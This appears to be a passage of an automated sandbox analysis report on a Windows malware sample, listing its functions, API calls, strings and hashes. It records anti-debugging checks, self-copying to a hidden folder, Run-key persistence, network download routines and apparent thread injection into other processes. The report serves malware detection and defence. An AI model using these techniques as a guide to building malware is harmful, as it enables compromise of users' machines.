                                                                                                                                                                                                                                  • Opcode ID: c50ff25f02d0d9740cf6f98af521503889310657cbdea9cda20ac6316b49b85e
                                                                                                                                                                                                                                  • Instruction ID: 5489a073f4ddb76ac888abcd090d4ed63c1048457e6270f8c99755357a10f11b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c50ff25f02d0d9740cf6f98af521503889310657cbdea9cda20ac6316b49b85e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6061FC699086D3A3EB64B721E8553BDA2A0BF84340FC0003DD56E866D5DE3DE50FC7A2
                                                                                                                                                                                                                                  Function 00007FF7F73E40AC Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                                                                                  • Opcode ID: 2dc5b7a4c2ac788fed40c1e4fd08826e44c1b763e7fe3fa29ec32dd5f663f271
                                                                                                                                                                                                                                  • Instruction ID: 6a4e6416dfe84ca1b73b668149d871ccaa39b481ff9c175db6b1005ff49a13a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dc5b7a4c2ac788fed40c1e4fd08826e44c1b763e7fe3fa29ec32dd5f663f271
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3731373AA1CA8183DB50DB05E44076AF760FBC4780F501039FA9E43BA8CF3DD44A8B41
                                                                                                                                                                                                                                  Function 00007FF7F73E31B4 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                                                                                  • Opcode ID: fb95f8ef0bc2ecc5dce42075ca2d6b9f5b34f365682c0d1478ff1e2aa5af605c
                                                                                                                                                                                                                                  • Instruction ID: fa72c482e03f2b7f88c9213c8a691557f63353a31f35549f09f667ff4f446fb0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb95f8ef0bc2ecc5dce42075ca2d6b9f5b34f365682c0d1478ff1e2aa5af605c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F03A2D90C2C2A3EB307B25E4043AAA7A0BF45708F84117CD5AD065D5CE7DE50EDB62
                                                                                                                                                                                                                                  Function 00007FF7F73E14EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 422 7ff7f73e14ec-7ff7f73e1528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                                                  • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                                  • Instruction ID: 75af4273ef11a6f648c2ef00b4684affd16553ebaad2dc1b4e85c3bb25191eb6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74E09276908F80D6C620EB15F84005AB7B4FBC8794F904125EADD42B28CF3CC669CB01
                                                                                                                                                                                                                                  Function 00007FF7F73E388C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E370C: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7F73E374C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E370C: GetVolumeInformationW.KERNELBASE ref: 00007FF7F73E37C9
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E370C: wsprintfW.USER32 ref: 00007FF7F73E386A
                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E38D5
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E38EA
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E38FD
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E390D
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E3920
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E3935
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E3948
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E395D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 4128e1d1825bb4aabfe353264e4b1b5eb3e5978e878722fa32083682d7f4baef
                                                                                                                                                                                                                                  • Instruction ID: 3f4ff02cf594f0864f255dc78acfa439f3077921adbe070693d857e41c3b6367
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4128e1d1825bb4aabfe353264e4b1b5eb3e5978e878722fa32083682d7f4baef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96114539A289C2A6DB60AB25F8543EAB362FFC4744F806035D55E43A68DF3CD41EC785
                                                                                                                                                                                                                                  Function 00007FF7F73E3A3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E370C: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7F73E374C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E370C: GetVolumeInformationW.KERNELBASE ref: 00007FF7F73E37C9
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E370C: wsprintfW.USER32 ref: 00007FF7F73E386A
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E38D5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E38EA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E38FD
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E390D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E3920
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E3935
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E3948
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E395D
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF7F73E3A81
                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE ref: 00007FF7F73E3A8C
                                                                                                                                                                                                                                  • CopyFileW.KERNELBASE ref: 00007FF7F73E3AA5
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE ref: 00007FF7F73E3ABD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: Services
                                                                                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                                  • Opcode ID: b030bd5570b1f3d854d8912712fee442359a6baf29157ec6f883af1572c370ec
                                                                                                                                                                                                                                  • Instruction ID: 4aa5e981262517197b895b2b9a552192eacb7c256b56833df7f6976327ffbd50
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b030bd5570b1f3d854d8912712fee442359a6baf29157ec6f883af1572c370ec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5016165A18586A3EB50AB24E8503EAA360FF94744FC0503AD26D835E4EE3CC20FCB91
                                                                                                                                                                                                                                  Function 00007FF7F73E370C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                                                                                  • Opcode ID: 2bf9011458a8b05a9254b4e26b90a8e12db43ff2ddd31f5c51e36a325afa16b9
                                                                                                                                                                                                                                  • Instruction ID: fd97a1161c696e8d6d74ea66ff5b906ffd6c58232fcdde7db1d765147b8f66a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bf9011458a8b05a9254b4e26b90a8e12db43ff2ddd31f5c51e36a325afa16b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF312D3661C6C5D6D730EB64E4983ABB3A0FF94700F80113AD69D87A98DB3DC40ACB55
                                                                                                                                                                                                                                  Function 00007FF7F73E397C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                                                                                  • Opcode ID: 0861401507e3e28e0f8f7b1c81fb4f9c72ec93ea9459558044e0fcb2a0648aa1
                                                                                                                                                                                                                                  • Instruction ID: e6f3b7a14f76c32080e43ae48bebc53e19355d4e5e6f194ce49d33794371b98c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0861401507e3e28e0f8f7b1c81fb4f9c72ec93ea9459558044e0fcb2a0648aa1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A11633652CB8096D7909B14F44066AB7A0FB847A0F506234F9AE43BE8DF7CD089CB51
                                                                                                                                                                                                                                  Function 00007FF7F73E3B1C Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 426 7ff7f73e3b1c-7ff7f73e3b42 VirtualAlloc
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 96049b04f01930e4aff45d12f7ff1c72481ede1cf3e6a7e626b6a38427c14eb7
                                                                                                                                                                                                                                  • Instruction ID: 91b70a11d68ba3700f218a751f4eeacb133d89ba3ad1c90138b641385b00d451
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96049b04f01930e4aff45d12f7ff1c72481ede1cf3e6a7e626b6a38427c14eb7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FC08CB5F26180C7DB1CEF32E491B0F6A20BB84740F90902CEA4257B84C93EC2668F00
                                                                                                                                                                                                                                  Function 00007FF7F73E3AEC Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 423 7ff7f73e3aec-7ff7f73e3afb 424 7ff7f73e3b10-7ff7f73e3b14 423->424 425 7ff7f73e3afd-7ff7f73e3b0a VirtualFree 423->425 425->424
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                  • Opcode ID: 030cb471ab07ba67b75c17a021bb035fd128cd39a350b8677565999cf01361e6
                                                                                                                                                                                                                                  • Instruction ID: 875f02bc37110bf2dc2cf3ee9f1f4102314d7413b92a67e88fde0b71335dc848
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 030cb471ab07ba67b75c17a021bb035fd128cd39a350b8677565999cf01361e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0ED01315F3498192E754A716D445715A250FFC4744F80903DD5CA41594CF3CC09D8F41

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FF7F73E2168 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7F73E21A5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                                  • Opcode ID: 4f77daa9b4afcd7238f1659cf5dbd7bb3687eb2434c9a3b17e92dc5a8002e488
                                                                                                                                                                                                                                  • Instruction ID: a8cfb7105606cf425059ee8669f1335251d10cbb6060dfaf9997ce33fc8f11d9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f77daa9b4afcd7238f1659cf5dbd7bb3687eb2434c9a3b17e92dc5a8002e488
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3971483A918A8193E750AB50F85436EF760FFC4794F901039EA9E43BA8CF7DD4498B51
                                                                                                                                                                                                                                  Function 00007FF7F73E10D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OpenProcess
                                                                                                                                                                                                                                  • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                                  • API String ID: 3743895883-721857904
                                                                                                                                                                                                                                  • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                                  • Instruction ID: aef2b653fe79e0385e2b8ead7842c20a69a7c081700a012ca9d72ae7dc3e37b4
